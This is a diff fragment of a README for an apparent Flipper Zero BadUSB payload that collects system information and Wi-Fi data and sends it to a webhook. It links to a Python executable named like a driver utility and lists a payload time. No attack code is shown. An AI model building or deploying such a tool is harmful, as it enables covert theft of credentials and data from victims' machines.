PCMon/FlipperZero-BadUSB-BadKB-SysInfoAndWifi/README.md

 [Full .exe code also included.](https://github.com/PCMon/FlipperZero-BadUSB-BadKB-SysInfoAndWifi/blob/main/TempDriverUtil.py)

 If the program fails in some way to collect any information as seen in the webhook embeds please comment the issue and i'll look into it.
-(GPU data currently only works for NVIDIA gpus)
+(GPU data currently only works for NVIDIA gpus).

 PAYLOAD TIME: 15.812s